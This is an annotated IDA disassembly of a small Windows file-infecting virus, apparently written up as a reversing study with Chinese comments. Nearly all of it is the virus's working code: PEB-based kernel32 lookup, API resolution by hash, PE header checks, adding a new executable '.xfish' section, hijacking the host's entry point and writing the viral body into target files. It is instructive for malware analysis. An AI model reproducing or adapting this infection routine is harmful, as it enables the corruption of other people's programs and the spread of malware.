.Lonely:00401000 assume es:nothing, ss:nothing, ds:_Lonely, fs:nothing, gs:nothing
.Lonely:00401000
.Lonely:00401000 ; =============== S U B R O U T I N E =======================================
.Lonely:00401000
.Lonely:00401000
.Lonely:00401000 public start
.Lonely:00401000 start proc near ; DATA XREF: .Lonely:0040126Er
.Lonely:00401000 pusha
.Lonely:00401001 call near ptr sub_40100C
.Lonely:00401006
.Lonely:00401006 loc_401006: ; DATA XREF: sub_40100C+1o
.Lonely:00401006 int 3 ; - software interrupt to invoke the debugger
.Lonely:00401008 int 3 ; - software interrupt to invoke the debugger
.Lonely:0040100A int 3 ; - software interrupt to invoke the debugger
.Lonely:0040100A start endp ; sp-analysis failed
.Lonely:0040100A
.Lonely:0040100C
.Lonely:0040100C ; =============== S U B R O U T I N E =======================================
.Lonely:0040100C
.Lonely:0040100C
.Lonely:0040100C sub_40100C proc far ; CODE XREF: start+1p
.Lonely:0040100C
.Lonely:0040100C arg_C = dword ptr 10h
.Lonely:0040100C
.Lonely:0040100C ; FUNCTION CHUNK AT .Lonely:00401062 SIZE 0000004D BYTES
.Lonely:0040100C
.Lonely:0040100C pop ebp
.Lonely:0040100D sub ebp, offset loc_401006
.Lonely:00401013 call sub_4010C8 ; 取基址给eax
.Lonely:00401018 lea edi, closehandle[ebp]
.Lonely:0040101E push edi
.Lonely:0040101F push eax
.Lonely:00401020 call sub_4010E9 ; 搜索api地址
.Lonely:00401020 ;
.Lonely:00401025 call loc_401031 ; 主体
.Lonely:0040102A jnz short near ptr loc_40109C+3
.Lonely:0040102C db 65h
.Lonely:0040102C jb short loc_401062
.Lonely:0040102F xor al, [eax]
.Lonely:0040102F sub_40100C endp ; sp-analysis failed
.Lonely:0040102F
.Lonely:00401031
.Lonely:00401031 loc_401031: ; CODE XREF: sub_40100C+19p
.Lonely:00401031 call dword ptr [edi+54h] ; loadlibrary user32
.Lonely:00401031 ;
.Lonely:00401034 push edi
.Lonely:00401035 push eax
.Lonely:00401036 call sub_4010E9 ; 获取api地址
.Lonely:0040103B test ebp, ebp
.Lonely:0040103D jz short loc_4010B3
.Lonely:0040103F push 0
.Lonely:00401041 call near ptr loc_401050+1
.Lonely:00401046 push esi
.Lonely:00401047 imul esi, [edx+75h], 65442073h
.Lonely:0040104E insd
.Lonely:0040104F outsd
.Lonely:00401050
.Lonely:00401050 loc_401050: ; CODE XREF: .Lonely:00401041p
.Lonely:00401050 add al, ch
.Lonely:00401052 aaa
.Lonely:00401052 ; ---------------------------------------------------------------------------
.Lonely:00401053 db 0
.Lonely:00401054 dd 79620000h, 6966783Ah, 68206873h
.Lonely:00401060 db 2 dup(74h)
.Lonely:00401062 ; ---------------------------------------------------------------------------
.Lonely:00401062 ; START OF FUNCTION CHUNK FOR sub_40100C
.Lonely:00401062
.Lonely:00401062 loc_401062: ; CODE XREF: sub_40100C+20j
.Lonely:00401062 jo short near ptr loc_40109C+2
.Lonely:00401064 das
.Lonely:00401065 das
.Lonely:00401066 ja short loc_4010DF
.Lonely:00401068 ja short loc_401098
.Lonely:0040106A jo short near ptr loc_4010D0+1
.Lonely:0040106C imul edi, fs:[ecx+2Eh], 206D6F63h
.Lonely:00401074 push 3A707474h
.Lonely:00401079 das
.Lonely:0040107A das
.Lonely:0040107B ja short near ptr loc_4010F1+3
.Lonely:0040107D ja short near ptr locret_4010AC+1
.Lonely:0040107F push 656B6361h
.Lonely:00401084 jb short near ptr loc_4010B3+1
.Lonely:00401086 arpl [edi+6Dh], bp
.Lonely:00401089 arpl cs:[esi+0], bp
.Lonely:0040108D push 0
.Lonely:0040108F call dword ptr [edi+5Ch]
.Lonely:00401092 push ss:off_401357[ebp]
.Lonely:00401098
.Lonely:00401098 loc_401098: ; CODE XREF: sub_40100C+5Cj
.Lonely:00401098 pop [esp+0Ch+arg_C]
.Lonely:0040109C
.Lonely:0040109C loc_40109C: ; CODE XREF: sub_40100C:loc_401062j
.Lonely:0040109C ; sub_40100C+1Ej
.Lonely:0040109C call near ptr loc_4010AA+1
.Lonely:004010A1 jz short near ptr loc_401107+1
.Lonely:004010A3 jnb short loc_401119
.Lonely:004010A5 xor ch, [esi]
.Lonely:004010A7 db 65h
.Lonely:004010A7 js short near ptr loc_40110E+1
.Lonely:004010AA
.Lonely:004010AA loc_4010AA: ; CODE XREF: sub_40100C:loc_40109Cp
.Lonely:004010AA add al, ch
.Lonely:004010AC
.Lonely:004010AC locret_4010AC: ; CODE XREF: sub_40100C+71j
.Lonely:004010AC retf 0
.Lonely:004010AC ; END OF FUNCTION CHUNK FOR sub_40100C
.Lonely:004010AC ; ---------------------------------------------------------------------------
.Lonely:004010AF align 10h
.Lonely:004010B0 popa
.Lonely:004010B1 push eax
.Lonely:004010B2 retn
.Lonely:004010B3 ; ---------------------------------------------------------------------------
.Lonely:004010B3
.Lonely:004010B3 loc_4010B3: ; CODE XREF: .Lonely:0040103Dj
.Lonely:004010B3 ; sub_40100C+78j
.Lonely:004010B3 call near ptr loc_4010C0+1
.Lonely:004010B8 jz short near ptr loc_40111C+3
.Lonely:004010BA jnb short near ptr loc_40112F+1
.Lonely:004010BC db 2Eh, 65h
.Lonely:004010BC js short near ptr loc_401124+1
.Lonely:004010C0
.Lonely:004010C0 loc_4010C0: ; CODE XREF: .Lonely:loc_4010B3p
.Lonely:004010C0 add al, ch ; 这里解析错误应该跳转到0040117Ah
.Lonely:004010C2 mov ah, 0
.Lonely:004010C2 ; ---------------------------------------------------------------------------
.Lonely:004010C4 dd 0C3610000h
.Lonely:004010C8
.Lonely:004010C8 ; =============== S U B R O U T I N E =======================================
.Lonely:004010C8
.Lonely:004010C8
.Lonely:004010C8 sub_4010C8 proc near ; CODE XREF: sub_40100C+7p
.Lonely:004010C8 sub eax, eax ;这一段就是获取
.Lonely:004010CA mov eax, fs:[eax+30h]
.Lonely:004010CE test eax, eax
.Lonely:004010D0
.Lonely:004010D0 loc_4010D0: ; CODE XREF: sub_40100C+5Ej
.Lonely:004010D0 js short loc_4010DF
.Lonely:004010D2 mov eax, [eax+0Ch]
.Lonely:004010D5 mov eax, [eax+1Ch]
.Lonely:004010D8 mov eax, [eax]
.Lonely:004010DA mov eax, [eax+8]
.Lonely:004010DD jmp short locret_4010E8
.Lonely:004010DF ; ---------------------------------------------------------------------------
.Lonely:004010DF
.Lonely:004010DF loc_4010DF: ; CODE XREF: sub_40100C+5Aj
.Lonely:004010DF ; sub_4010C8:loc_4010D0j
.Lonely:004010DF mov eax, [eax+34h]
.Lonely:004010E2 lea eax, [eax+7Ch]
.Lonely:004010E5 mov eax, [eax+3Ch]
.Lonely:004010E8
.Lonely:004010E8 locret_4010E8: ; CODE XREF: sub_4010C8+15j
.Lonely:004010E8 retn
.Lonely:004010E8 sub_4010C8 endp
.Lonely:004010E8
.Lonely:004010E9
.Lonely:004010E9 ; =============== S U B R O U T I N E =======================================
.Lonely:004010E9
.Lonely:004010E9
.Lonely:004010E9 sub_4010E9 proc near ; CODE XREF: sub_40100C+14p
.Lonely:004010E9 ; .Lonely:00401036p
.Lonely:004010E9
.Lonely:004010E9 var_24 = dword ptr -24h
.Lonely:004010E9 arg_0 = dword ptr 4
.Lonely:004010E9 arg_4 = dword ptr 8
.Lonely:004010E9
.Lonely:004010E9 pusha
.Lonely:004010EA mov ebx, [esp+20h+arg_0]
.Lonely:004010EE mov edx, [ebx+3Ch]
.Lonely:004010F1
.Lonely:004010F1 loc_4010F1: ; CODE XREF: sub_40100C+6Fj
.Lonely:004010F1 mov esi, [ebx+edx+78h]
.Lonely:004010F5 lea esi, [esi+ebx+18h]
.Lonely:004010F9 lodsd
.Lonely:004010FA xchg eax, ecx
.Lonely:004010FB lodsd
.Lonely:004010FC add eax, ebx
.Lonely:004010FE xchg eax, ebp
.Lonely:004010FF lodsd
.Lonely:00401100 add eax, ebx
.Lonely:00401102 xchg eax, edx
.Lonely:00401103 lodsd
.Lonely:00401104 add eax, ebx
.Lonely:00401106 push eax
.Lonely:00401107
.Lonely:00401107 loc_401107: ; CODE XREF: sub_40100C+95j
.Lonely:00401107 mov esi, edx
.Lonely:00401109
.Lonely:00401109 loc_401109: ; CODE XREF: sub_4010E9:loc_40113Cj
.Lonely:00401109 lodsd
.Lonely:0040110A add eax, ebx
.Lonely:0040110C xor edx, edx
.Lonely:0040110E
.Lonely:0040110E loc_40110E: ; CODE XREF: sub_4010E9+2Ej
.Lonely:0040110E ; sub_40100C+9Bj
.Lonely:0040110E rol edx, 3
.Lonely:00401111 xor dl, [eax]
.Lonely:00401113 inc eax
.Lonely:00401114 cmp byte ptr [eax], 0
.Lonely:00401117 jnz short loc_40110E
.Lonely:00401119
.Lonely:00401119 loc_401119: ; CODE XREF: sub_40100C+97j
.Lonely:00401119 mov eax, [esp+24h+var_24]
.Lonely:0040111C
.Lonely:0040111C loc_40111C: ; CODE XREF: .Lonely:004010B8j
.Lonely:0040111C add [esp+24h+var_24], 2
.Lonely:00401120 mov edi, [esp+24h+arg_4]
.Lonely:00401124
.Lonely:00401124 loc_401124: ; CODE XREF: sub_4010E9+51j
.Lonely:00401124 ; .Lonely:004010BCj
.Lonely:00401124 cmp [edi], edx
.Lonely:00401126 jnz short loc_401135
.Lonely:00401128 movzx eax, word ptr [eax]
.Lonely:0040112B mov eax, [ebp+eax*4+0]
.Lonely:0040112F
.Lonely:0040112F loc_40112F: ; CODE XREF: .Lonely:004010BAj
.Lonely:0040112F add eax, ebx
.Lonely:00401131 scasd
.Lonely:00401132 stosd
.Lonely:00401133 jmp short loc_40113C
.Lonely:00401135 ; ---------------------------------------------------------------------------
.Lonely:00401135
.Lonely:00401135 loc_401135: ; CODE XREF: sub_4010E9+3Dj
.Lonely:00401135 scasd
.Lonely:00401136 scasd
.Lonely:00401137 cmp dword ptr [edi], 0
.Lonely:0040113A jnz short loc_401124
.Lonely:0040113C
.Lonely:0040113C loc_40113C: ; CODE XREF: sub_4010E9+4Aj
.Lonely:0040113C loop loc_401109
.Lonely:0040113E pop ecx
.Lonely:0040113F popa
.Lonely:00401140 retn 8
.Lonely:00401140 sub_4010E9 endp
.Lonely:00401140
.Lonely:00401143
.Lonely:00401143 ; =============== S U B R O U T I N E =======================================
.Lonely:00401143
.Lonely:00401143 ; 判断是不是pe文件
.Lonely:00401143
.Lonely:00401143 sub_401143 proc near ; CODE XREF: .Lonely:004011EEp
.Lonely:00401143
.Lonely:00401143 arg_0 = dword ptr 4
.Lonely:00401143
.Lonely:00401143 mov edx, [esp+arg_0]
.Lonely:00401147 cmp word ptr [edx], 'ZM'
.Lonely:0040114C jnz short loc_40115C
.Lonely:0040114E add edx, [edx+3Ch]
.Lonely:00401151 cmp word ptr [edx], 'EP'
.Lonely:00401156 jnz short loc_40115C
.Lonely:00401158 stc
.Lonely:00401159 retn 4
.Lonely:0040115C ; ---------------------------------------------------------------------------
.Lonely:0040115C
.Lonely:0040115C loc_40115C: ; CODE XREF: sub_401143+9j
.Lonely:0040115C ; sub_401143+13j
.Lonely:0040115C clc
.Lonely:0040115D retn 4
.Lonely:0040115D sub_401143 endp
.Lonely:0040115D
.Lonely:00401160
.Lonely:00401160 ; =============== S U B R O U T I N E =======================================
.Lonely:00401160
.Lonely:00401160
.Lonely:00401160 sub_401160 proc near ; CODE XREF: .Lonely:00401180p
.Lonely:00401160
.Lonely:00401160 arg_0 = dword ptr 4
.Lonely:00401160
.Lonely:00401160 push 0
.Lonely:00401162 push esp
.Lonely:00401163 push [esp+8+arg_0]
.Lonely:00401167 call ss:getbinarytypea_0[ebp]
.Lonely:0040116D pop eax
.Lonely:0040116E test eax, eax
.Lonely:00401170 jnz short loc_401176
.Lonely:00401172 stc
.Lonely:00401173 retn 4
.Lonely:00401176 ; ---------------------------------------------------------------------------
.Lonely:00401176
.Lonely:00401176 loc_401176: ; CODE XREF: sub_401160+10j
.Lonely:00401176 clc
.Lonely:00401177 retn 4
.Lonely:00401177 sub_401160 endp
.Lonely:00401177
.Lonely:0040117A ; ---------------------------------------------------------------------------
.Lonely:0040117A pusha
.Lonely:0040117B mov esi, [esp+24h]
.Lonely:0040117F push esi
.Lonely:00401180 call sub_401160 ; 判断文件是不是32位文件
.Lonely:00401180 ;
.Lonely:00401185 jnb loc_401298 ; 不是跳转
.Lonely:00401185 ;
.Lonely:0040118B sub eax, eax
.Lonely:0040118D push eax
.Lonely:0040118E push eax
.Lonely:0040118F push 3
.Lonely:00401191 push eax
.Lonely:00401192 push 2
.Lonely:00401194 push 0C0000000h
.Lonely:00401199 push esi
.Lonely:0040119A call dword ptr ss:creatfile_1[ebp] ; 打开文件
.Lonely:004011A0 cmp eax, 0FFFFFFFFh ; 打开失败跳转到结束
.Lonely:004011A0 ; 成功eax返回局柄
.Lonely:004011A3 jz loc_401298
.Lonely:004011A9 xchg eax, ebx
.Lonely:004011AA push 0
.Lonely:004011AC push ebx
.Lonely:004011AD call ss:getfilesize[ebp] ; 获取文件大小 为后面读文件作准备
.Lonely:004011B3 push eax
.Lonely:004011B4 push 4
.Lonely:004011B6 push 1000h
.Lonely:004011BB push eax
.Lonely:004011BC push 0
.Lonely:004011BE call ss:virtualalloc_0[ebp] ; 开辟内存 读文件用
.Lonely:004011C4 pop edx
.Lonely:004011C5 test eax, eax
.Lonely:004011C7 jz loc_401291
.Lonely:004011CD xchg eax, edi
.Lonely:004011CE mov dword ptr ss:(loc_401285+1)[ebp], edx
.Lonely:004011D4 push 0
.Lonely:004011D6 push esp
.Lonely:004011D7 push dword ptr ss:(loc_401285+1)[ebp]
.Lonely:004011DD push edi
.Lonely:004011DE push ebx
.Lonely:004011DF call ss:readfile[ebp] ; 读文件
.Lonely:004011E5 test eax, eax
.Lonely:004011E7 jz loc_401280
.Lonely:004011ED push edi
.Lonely:004011EE call sub_401143 ; 判断是不是pe文件
.Lonely:004011F3 jnb loc_401280
.Lonely:004011F9 push 3BCh
.Lonely:004011FE push edi
.Lonely:004011FF call sub_40129C ; 添加节
.Lonely:00401204 test eax, eax
.Lonely:00401206 jz short loc_401280
.Lonely:00401208 mov eax, edi
.Lonely:0040120A add eax, [eax+3Ch] ; edi是文件头
.Lonely:0040120D mov ecx, edx
.Lonely:0040120F xchg ecx, [eax+28h] ; 程序入口rva
.Lonely:00401212 add ecx, [eax+34h] ; 程序基址
.Lonely:00401215 mov ss:off_401357[ebp], ecx
.Lonely:0040121B push 0
.Lonely:0040121D push 0
.Lonely:0040121F push 0
.Lonely:00401221 push ebx
.Lonely:00401222 call ss:setendoffile[ebp] ; 移动指针到文件头
.Lonely:00401228 push 0
.Lonely:0040122A push esp
.Lonely:0040122B lea eax, (loc_401285+1)[ebp]
.Lonely:00401231 push dword ptr [eax]
.Lonely:00401233 push edi
.Lonely:00401234 push ebx
.Lonely:00401235 call ss:writefile_0[ebp]
.Lonely:0040123B test eax, eax
.Lonely:0040123D jz short loc_401280
.Lonely:0040123F push 2
.Lonely:00401241 push 0
.Lonely:00401243 push 3BCh
.Lonely:00401248 push ebx
.Lonely:00401249 call ss:setendoffile[ebp]
.Lonely:0040124F push ebx
.Lonely:00401250 call ss:setfilepointer[ebp]
.Lonely:00401256 push 1
.Lonely:00401258 push 0
.Lonely:0040125A push 0FFFFFC44h
.Lonely:0040125F push ebx
.Lonely:00401260 call ss:setendoffile[ebp]
.Lonely:00401266 push 0
.Lonely:00401268 push esp
.Lonely:00401269 push 3BCh
.Lonely:0040126E lea eax, start[ebp]
.Lonely:00401274 push eax
.Lonely:00401275 push ebx
.Lonely:00401276 call ss:writefile_0[ebp]
.Lonely:0040127C test eax, eax
.Lonely:0040127E jz short $+2
.Lonely:00401280
.Lonely:00401280 loc_401280: ; CODE XREF: .Lonely:004011E7j
.Lonely:00401280 ; .Lonely:004011F3j ...
.Lonely:00401280 push 4000h
.Lonely:00401285
.Lonely:00401285 loc_401285: ; DATA XREF: .Lonely:loc_401285o
.Lonely:00401285 ; .Lonely:004011CEw ...
.Lonely:00401285 push offset loc_401285
.Lonely:0040128A push edi
.Lonely:0040128B call ss:writefile[ebp]
.Lonely:00401291
.Lonely:00401291 loc_401291: ; CODE XREF: .Lonely:004011C7j
.Lonely:00401291 push ebx
.Lonely:00401292 call dword ptr ss:unk_401360[ebp]
.Lonely:00401298
.Lonely:00401298 loc_401298: ; CODE XREF: .Lonely:00401185j
.Lonely:00401298 ; .Lonely:004011A3j
.Lonely:00401298 popa
.Lonely:00401299 retn 4
.Lonely:0040129C
.Lonely:0040129C ; =============== S U B R O U T I N E =======================================
.Lonely:0040129C
.Lonely:0040129C
.Lonely:0040129C sub_40129C proc near ; CODE XREF: .Lonely:004011FFp
.Lonely:0040129C
.Lonely:0040129C var_40 = dword ptr -40h
.Lonely:0040129C var_3C = dword ptr -3Ch
.Lonely:0040129C var_C = dword ptr -0Ch
.Lonely:0040129C var_4 = dword ptr -4
.Lonely:0040129C arg_0 = dword ptr 4
.Lonely:0040129C arg_4 = dword ptr 8
.Lonely:0040129C
.Lonely:0040129C pusha
.Lonely:0040129D mov ebx, [esp+20h+arg_0]
.Lonely:004012A1 mov esi, ebx
.Lonely:004012A3 add esi, [esi+3Ch] ; esi 指向pe头
.Lonely:004012A6 movzx ecx, word ptr [esi+14h]
.Lonely:004012AA lea edi, [esi+ecx+18h] ; edi 指向section table 头
.Lonely:004012AE lea edx, [esi+74h]
.Lonely:004012B1 cmp dword ptr [edx], 10h
.Lonely:004012B4 jl short loc_4012BD ; 磁盘文件 偏移
.Lonely:004012B6 mov dword ptr [edx+5Ch], 0
.Lonely:004012BD
.Lonely:004012BD loc_4012BD: ; CODE XREF: sub_40129C+18j
.Lonely:004012BD mov edx, [edi+14h] ; 磁盘文件 偏移
.Lonely:004012C0 add edx, ebx
.Lonely:004012C2 movzx ecx, word ptr [esi+6]
.Lonely:004012C6 imul ecx, 28h
.Lonely:004012C9 add edi, ecx
.Lonely:004012CB push edx
.Lonely:004012CC mov eax, edi
.Lonely:004012CE sub edx, eax
.Lonely:004012D0 cmp edx, 28h ; 这里在比较 能不能有空间添加节头
.Lonely:004012D3 pop edx
.Lonely:004012D4 jge short loc_401307 ; 添加节
.Lonely:004012D6 cmp word ptr [ebx+0Ch], 'EP' ; 比较是不是pe
.Lonely:004012DC jnz short loc_4012E6
.Lonely:004012DE xor eax, eax
.Lonely:004012E0 mov [esp+20h+var_4], eax
.Lonely:004012E4 jmp short loc_401352
.Lonely:004012E6 ; ---------------------------------------------------------------------------
.Lonely:004012E6
.Lonely:004012E6 loc_4012E6: ; CODE XREF: sub_40129C+40j
.Lonely:004012E6 sub eax, esi
.Lonely:004012E8 xchg eax, ecx
.Lonely:004012E9 pusha
.Lonely:004012EA lea edi, [ebx+0Ch]
.Lonely:004012ED mov [esp+40h+var_3C], edi
.Lonely:004012F1 cld
.Lonely:004012F2 rep movsb
.Lonely:004012F4 mov [esp+40h+var_40], edi
.Lonely:004012F7 sub edx, edi
.Lonely:004012F9 xchg ecx, edx
.Lonely:004012FB xor eax, eax
.Lonely:004012FD rep stosb
.Lonely:004012FF popa
.Lonely:00401300 mov dword ptr [ebx+3Ch], 0Ch
.Lonely:00401307
.Lonely:00401307 loc_401307: ; CODE XREF: sub_40129C+38j
.Lonely:00401307 inc word ptr [esi+6] ; 添加节
.Lonely:0040130B mov dword ptr [edi], 'ifx.'
.Lonely:00401311 mov word ptr [edi+4], 'hs'
.Lonely:00401317 push [esp+20h+arg_4]
.Lonely:0040131B pop dword ptr [edi+10h]
.Lonely:0040131E lea edx, [edi-28h]
.Lonely:00401321 mov eax, [edx+14h]
.Lonely:00401324 mov ecx, [edx+10h]
.Lonely:00401327 add eax, ecx
.Lonely:00401329 mov [edi+14h], eax
.Lonely:0040132C mov [esp+20h+var_4], eax
.Lonely:00401330 push [esp+20h+arg_4]
.Lonely:00401334 pop dword ptr [edi+8]
.Lonely:00401337 push dword ptr [esi+50h]
.Lonely:0040133A pop eax
.Lonely:0040133B mov [edi+0Ch], eax
.Lonely:0040133E mov [esp+20h+var_C], eax
.Lonely:00401342 mov dword ptr [edi+24h], 0E0000020h
.Lonely:00401349 mov ecx, [edi+8]
.Lonely:0040134C add ecx, [edi+0Ch]
.Lonely:0040134F mov [esi+50h], ecx
.Lonely:00401352
.Lonely:00401352 loc_401352: ; CODE XREF: sub_40129C+48j
.Lonely:00401352 popa
.Lonely:00401353 retn 8
.Lonely:00401353 sub_40129C endp
.Lonely:00401353
.Lonely:00401353 ; ---------------------------------------------------------------------------
.Lonely:00401356 byte_401356 db 68h ; DATA XREF: .Lonely:off_401357o
.Lonely:00401357 off_401357 dd offset byte_401356 ; DATA XREF: sub_40100C+86r
.Lonely:00401357 ; .Lonely:00401215w
.Lonely:0040135B ; ---------------------------------------------------------------------------
.Lonely:0040135B retn
.Lonely:0040135B ; ---------------------------------------------------------------------------
.Lonely:0040135C closehandle db 16h ; DATA XREF: sub_40100C+Cr
.Lonely:0040135D db 0D6h ; ?
.Lonely:0040135E db 0D6h ; ?
.Lonely:0040135F db 0C0h ; ?
.Lonely:00401360 unk_401360 db 0 ; DATA XREF: .Lonely:00401292r
.Lonely:00401361 db 0
.Lonely:00401362 db 0
.Lonely:00401363 db 0
.Lonely:00401364 creatfile_0 db 7Ah ; z
.Lonely:00401365 db 2Ah ; *
.Lonely:00401366 db 0C6h ; ?
.Lonely:00401367 db 38h ; 8
.Lonely:00401368 creatfile_1 db 0 ; DATA XREF: .Lonely:0040119Ar
.Lonely:00401369 db 0
.Lonely:0040136A db 0
.Lonely:0040136B getbinarytypea db 0
.Lonely:0040136C dd 0ABD10842h
.Lonely:00401370 getbinarytypea_0 dd 0 ; DATA XREF: sub_401160+7r
.Lonely:00401374 dd 9554EFE7h
.Lonely:00401378 getfilesize dd 0 ; DATA XREF: .Lonely:004011ADr
.Lonely:0040137C dd 0BE25545h
.Lonely:00401380 readfile dd 0 ; DATA XREF: .Lonely:004011DFr
.Lonely:00401384 dd 0A97175F9h
.Lonely:00401388 setfilepointer dd 0 ; DATA XREF: .Lonely:00401250r
.Lonely:0040138C dd 0A9D1FD70h
.Lonely:00401390 setendoffile dd 0 ; DATA XREF: .Lonely:00401222r
.Lonely:00401390 ; .Lonely:00401249r ...
.Lonely:00401394 dd 0AB16D0AEh
.Lonely:00401398 virtualalloc_0 dd 0 ; DATA XREF: .Lonely:004011BEr
.Lonely:0040139C dd 0B562D3DBh
.Lonely:004013A0 writefile dd 0 ; DATA XREF: .Lonely:0040128Br
.Lonely:004013A4 dd 58D8C545h
.Lonely:004013A8 writefile_0 dd 0 ; DATA XREF: .Lonely:00401235r
.Lonely:004013A8 ; .Lonely:00401276r
.Lonely:004013AC db 89h
.Lonely:004013AD db 0FDh ; ?
.Lonely:004013AE db 12h
.Lonely:004013AF db 0A4h ; ?
.Lonely:004013B0 db 0
.Lonely:004013B1 db 0
.Lonely:004013B2 db 0
.Lonely:004013B3 db 0
.Lonely:004013B4 db 51h
.Lonely:004013B5 db 4Ch ; L
.Lonely:004013B6 db 0D1h ; ?
.Lonely:004013B7 db 14h
.Lonely:004013B8 db 0
.Lonely:004013B9 db 0
.Lonely:004013BA db 0
.Lonely:004013BB db 0
.Lonely:004013BC db 0
.Lonely:004013BD db 0
.Lonely:004013BE db 0
.Lonely:004013BF db 0
.Lonely:004013C0 db 0
.Lonely:004013C1 db 0
.Lonely:004013C2 db 0
.Lonely:004013C3 db 0
.Lonely:004013C4 db 0
.Lonely:004013C5 db 0
.Lonely:004013C6 db 0
.Lonely:004013C7 db 0
.Lonely:004013C8 db 0
.Lonely:004013C9 db 0
.Lonely:004013CA db 0
.Lonely:004013CB db 0
.Lonely:004013CC db 0
.Lonely:004013CD db 0
.Lonely:004013CE db 0
.Lonely:004013CF db 0
.Lonely:004013D0 db 0
.Lonely:004013D1 db 0
.Lonely:004013D2 db 0
.Lonely:004013D3 db 0
.Lonely:004013D4 db 0
.Lonely:004013D5 db 0
.Lonely:004013D6 db 0
.Lonely:004013D7 db 0
.Lonely:004013D8 db 0
.Lonely:004013D9 db 0
.Lonely:004013DA db 0
.Lonely:004013DB db 0
.Lonely:004013DC db 0
.Lonely:004013DD db 0
.Lonely:004013DE db 0
.Lonely:004013DF db 0
.Lonely:004013E0 db 0
.Lonely:004013E1 db 0
.Lonely:004013E2 db 0
.Lonely:004013E3 db 0
.Lonely:004013E4 db 0
.Lonely:004013E5 db 0
.Lonely:004013E6 db 0
.Lonely:004013E7 db 0
.Lonely:004013E8 db 0
.Lonely:004013E9 db 0
.Lonely:004013EA db 0
.Lonely:004013EB db 0
.Lonely:004013EC db 0
.Lonely:004013ED db 0
.Lonely:004013EE db 0
.Lonely:004013EF db 0
.Lonely:004013F0 db 0
.Lonely:004013F1 db 0
.Lonely:004013F2 db 0
.Lonely:004013F3 db 0
.Lonely:004013F4 db 0
.Lonely:004013F5 db 0
.Lonely:004013F6 db 0
.Lonely:004013F7 db 0
.Lonely:004013F8 db 0
.Lonely:004013F9 db 0
.Lonely:004013FA db 0
.Lonely:004013FB db 0
.Lonely:004013FC db 0
.Lonely:004013FD db 0
.Lonely:004013FE db 0
.Lonely:004013FF db 0
.Lonely:004013FF _Lonely ends
